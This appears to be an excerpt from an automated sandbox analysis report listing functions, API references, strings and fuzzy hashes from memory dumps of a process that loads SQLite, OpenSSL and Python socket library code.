831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87EF83E
database corruption, xrefs: 00007FF8A87EF84A
%s at line %d of [%.10s], xrefs: 00007FF8A87EF856

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 0-3764764234
Opcode ID: da0e3b0cac070f2e21a81489abfb1d15809828ce554804e79c7fc2e092d5fd35
Instruction ID: 3347734c35816d05c06bcaa944702f281eddc29137e812715224a515711af5ca
Opcode Fuzzy Hash: da0e3b0cac070f2e21a81489abfb1d15809828ce554804e79c7fc2e092d5fd35
Instruction Fuzzy Hash: 2FA15633A0E2D16BD7648B2894946BE7BA1FB817C4F444275DB8A83B81EF3CE545C724

Function 00007FF8A87DDBB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DDC3C

Strings

winOpenShm, xrefs: 00007FF8A87DDE49
readonly_shm, xrefs: 00007FF8A87DDDDA
%s-shm, xrefs: 00007FF8A87DDC53

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 3568877910-2815843928
Opcode ID: 1a8e526a86d5bd3d1dc346dfb474fdedb13c42aa3d381dcbd1f76d89d3ec6e10
Instruction ID: 8b8d41e790bffb5ad3ba0aa5c2d3122d072e162f1a6e9cb0cbce8ab45f049533
Opcode Fuzzy Hash: 1a8e526a86d5bd3d1dc346dfb474fdedb13c42aa3d381dcbd1f76d89d3ec6e10
Instruction Fuzzy Hash: 2CC19121A0FB42A6EB64DB21E4586797BA0FF44BD1F484135D95E432A0EF3CE444CB68

Function 00007FF8A87EFCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87EFEF9

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87EFD87, 00007FF8A87EFF1D
database corruption, xrefs: 00007FF8A87EFD93, 00007FF8A87EFF2A
%s at line %d of [%.10s], xrefs: 00007FF8A87EFD9F, 00007FF8A87EFF36

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3568877910-3764764234
Opcode ID: 46965cf42d5689f6b193c2113cb8e7912a1c14311205a5f033bcee06f9a4063e
Instruction ID: fe87ec12ab00333624b24df0a0311dc944ac2ab7ae4b209c09cedf01430d7d19
Opcode Fuzzy Hash: 46965cf42d5689f6b193c2113cb8e7912a1c14311205a5f033bcee06f9a4063e
Instruction Fuzzy Hash: 24815723A0E2D16AE321CE25A0505F93E90E7117D1F4541BAEFCA477C1EB3CD986D728

Function 00007FF8A92FF1F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A92FF29E

Strings

ssl_get_new_session, xrefs: 00007FF8A92FF344, 00007FF8A92FF47D
SSL_SESSION_new, xrefs: 00007FF8A92FF250, 00007FF8A92FF301
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A92FF232, 00007FF8A92FF25C, 00007FF8A92FF30D, 00007FF8A92FF330, 00007FF8A92FF350, 00007FF8A92FF489, 00007FF8A92FF519, 00007FF8A92FF532, 00007FF8A92FF54B, 00007FF8A92FF564, 00007FF8A92FF57D, 00007FF8A92FF596, 00007FF8A92FF5AF, 00007FF8A92FF5D3

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
API String ID: 3535234312-2527649602
Opcode ID: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
Instruction ID: 884ae8ecf7ae38f5ce70552fa0e0a95e556a5176f05f831fb70266966fc49e38
Opcode Fuzzy Hash: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
Instruction Fuzzy Hash: 8CB17C21A0EAC2A2FB44EF61C8547F927A1FB84BC4F445035EA1DCB6AADF7CE5548310

Function 00007FF8A8824FD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A8825193

Strings

Cannot add a column to a view, xrefs: 00007FF8A8825083
virtual tables may not be altered, xrefs: 00007FF8A8825067
sqlite_altertab_%s, xrefs: 00007FF8A882519C

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3568877910-2063813899
Opcode ID: bac2819c299c2b8c8ae7ca61fdce0dbf7122666c5b70fc67fee337eb904e85ee
Instruction ID: 9323d28482951471bd9454eb28d1dcb961f55c638c37c7e36ec33a1bf0e97b19
Opcode Fuzzy Hash: bac2819c299c2b8c8ae7ca61fdce0dbf7122666c5b70fc67fee337eb904e85ee
Instruction Fuzzy Hash: 2A91EE62A0AB8596EB90CF41A4042BE77A5FF48BC1F498275DEAD07785EF3CE040C724

Function 00007FF8A92D2478 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON

Download Yara Rule

APIs

00007FF8BFAB1170.VCRUNTIME140 ref: 00007FF8A932D3BC

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A932D37D, 00007FF8A932D3E0, 00007FF8A932D448, 00007FF8A932D473, 00007FF8A932D4B5
D:\a\1\s\include\internal/packet.h, xrefs: 00007FF8A932D3F4, 00007FF8A932D415
tls_parse_ctos_server_name, xrefs: 00007FF8A932D371, 00007FF8A932D3CB, 00007FF8A932D43C, 00007FF8A932D467, 00007FF8A932D4A9

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007B1170
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
API String ID: 1749704820-4157686371
Opcode ID: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
Instruction ID: 11bce9a8da3a585cc0e24935f8292b7fea463ab7d61480feaec3c5d1a44e16de
Opcode Fuzzy Hash: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
Instruction Fuzzy Hash: F671C061A0EFC2A5EB609F21D4007BAB3A1EF967C4F586032DA5DC7A96DF2CE5408700

Function 00007FF8A8181FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8182008
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8182026

Strings

HANGUL SYLLABLE , xrefs: 00007FF8A8181FF5
CJK UNIFIED IDEOGRAPH-, xrefs: 00007FF8A818201C

Memory Dump Source

Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true

Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 800424832-87138338
Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
Instruction ID: 836de692d6d5b6435aff83334d9e40ea2ceeb8306696185e625e915e0197534a
Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
Instruction Fuzzy Hash: 95614472B1964266E6638E19A8016BA72A2FFA0BD4F544231EE5D43AC9DF7CE402C714

Function 00007FF8A87E9360 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87E9488

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87E9545
database corruption, xrefs: 00007FF8A87E9552
%s at line %d of [%.10s], xrefs: 00007FF8A87E955E

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3568877910-3764764234
Opcode ID: 0c51845e98e7720e469689b203a582e8fc8cb0b60341d8e22a06a30507cc7d53
Instruction ID: 64f186634bfe1b2048628f807fbae097af92a210e0e8935b5b36f757a0617284
Opcode Fuzzy Hash: 0c51845e98e7720e469689b203a582e8fc8cb0b60341d8e22a06a30507cc7d53
Instruction Fuzzy Hash: AE51782361AB82A7EB54CB26E5447AA73A4FB48BC4F584036DF4D43B94EF38E491C314

Function 00007FF8A87EB160 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87EB236

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87EB2D0
database corruption, xrefs: 00007FF8A87EB2DD
%s at line %d of [%.10s], xrefs: 00007FF8A87EB2E9

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3568877910-3764764234
Opcode ID: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
Instruction ID: f0dc5c33962669a9ad92bfffd9e619786280868213930bd2f49bcfba904deb22
Opcode Fuzzy Hash: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
Instruction Fuzzy Hash: A741DE32A2974693EB618F15E0402AD77A9FF88BD0F940135EE8E67794EF3CD8418754

Function 00007FF8A92D19DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A931238B
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A93123CD
00007FF8A82A4D18.LIBCRYPTO-3 ref: 00007FF8A931240F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FF8A931247E, 00007FF8A9312490

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
Instruction ID: d2369d746df01687198eb7493cd0d5316f97401aaf1d92306e6c3d00be798716
Opcode Fuzzy Hash: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
Instruction Fuzzy Hash: EE416B21A0FEC2A4FE54AF2194507B962F0EF80BD4F29A534DD5D8B7A9EF2CA4518314

Function 00007FF8B7E521B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32 ref: 00007FF8B7E521ED
GetLastError.KERNEL32 ref: 00007FF8B7E5323A

Strings

socket.gethostname, xrefs: 00007FF8B7E521C5

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: socket.gethostname
API String ID: 3560734967-2650736202
Opcode ID: 23993e633c6f5349713837bf9d929978e43608999645f41bb6445fc0d0233230
Instruction ID: 224ce5bfcbb217a47172dfabb459df6fa5d4b2606007cfc5cbb2384f90dc413a
Opcode Fuzzy Hash: 23993e633c6f5349713837bf9d929978e43608999645f41bb6445fc0d0233230
Instruction Fuzzy Hash: AC312BA9A0CBCA82E7249B69A81527E63A5FF88FC9F404435DB4E56674DF3CF145CA00

Function 00007FF8B7E5769C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

inet_ntop.WS2_32 ref: 00007FF8B7E57761

Strings

unknown address family %d, xrefs: 00007FF8B7E577C9
invalid length of packed IP address string, xrefs: 00007FF8B7E576EB, 00007FF8B7E57725
iy*:inet_ntop, xrefs: 00007FF8B7E576BD

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: inet_ntop
String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
API String ID: 448242623-2822559286
Opcode ID: c9b5c60fed4a7336b016a105fae48b6e24097897ac7e35673fe8ff53e75ab494
Instruction ID: cb15ab422c156e1667c0ab2994f4b318e7bd699ae79ee3e829b096507f0de393
Opcode Fuzzy Hash: c9b5c60fed4a7336b016a105fae48b6e24097897ac7e35673fe8ff53e75ab494
Instruction Fuzzy Hash: 4B31C5A5A28ACB95EB508B19E85467D23A0FF84FC9F401432DA4EA7674DE3CF548C700

Function 00007FF8B7E54D64 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00007FF8B7E54DD3
getsockopt.WS2_32 ref: 00007FF8B7E54E26

Strings

ii|i:getsockopt, xrefs: 00007FF8B7E54D84
getsockopt buflen out of range, xrefs: 00007FF8B7E54E64

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: getsockopt
String ID: getsockopt buflen out of range$ii|i:getsockopt
API String ID: 3272894102-2750947780
Opcode ID: 15b8bcdde415823467fdb4a0ed8eec2ce9c2fd89354c765c19f8db92f5921497
Instruction ID: 329aa7494a8679ec53ed032c8ac37acc4736bf429aa40948acbf1e1eb2361e1c
Opcode Fuzzy Hash: 15b8bcdde415823467fdb4a0ed8eec2ce9c2fd89354c765c19f8db92f5921497
Instruction Fuzzy Hash: 1831D7B2A18B8AC6EB148B29E45516E73A0FF85F94B500135EB4E87A78DF3CE505CB10

Function 00007FF8B7E56C38 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 00007FF8B7E56CC6

Strings

socket.gethostbyname, xrefs: 00007FF8B7E56C8A
idna, xrefs: 00007FF8B7E56C62
et:gethostbyname_ex, xrefs: 00007FF8B7E56C69

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: gethostbyname
String ID: et:gethostbyname_ex$idna$socket.gethostbyname
API String ID: 930432418-574663143
Opcode ID: 472c35d4f31a3a6c4440bdfb510f61285a4a51f7ab79870e4b2d6f4e868e8497
Instruction ID: 2eff320fee89c95780b160e4f52db854facdba6d1d5120b318098076d37e41ba
Opcode Fuzzy Hash: 472c35d4f31a3a6c4440bdfb510f61285a4a51f7ab79870e4b2d6f4e868e8497
Instruction Fuzzy Hash: B921E7A1B18BCA81EB609B69E9557AE6361FF88FC4F400032DB4E87675DE2CF145C700

Function 00007FF8B7E577EC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 00007FF8B7E5782B

Strings

is:inet_pton, xrefs: 00007FF8B7E57807
illegal IP address string passed to inet_pton, xrefs: 00007FF8B7E57849
unknown address family, xrefs: 00007FF8B7E57880

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: inet_pton
String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
API String ID: 1350483568-903159468
Opcode ID: b50fd2007816af9675bff2c5d78056b72218e157b97ee3f7d5316108d01f2432
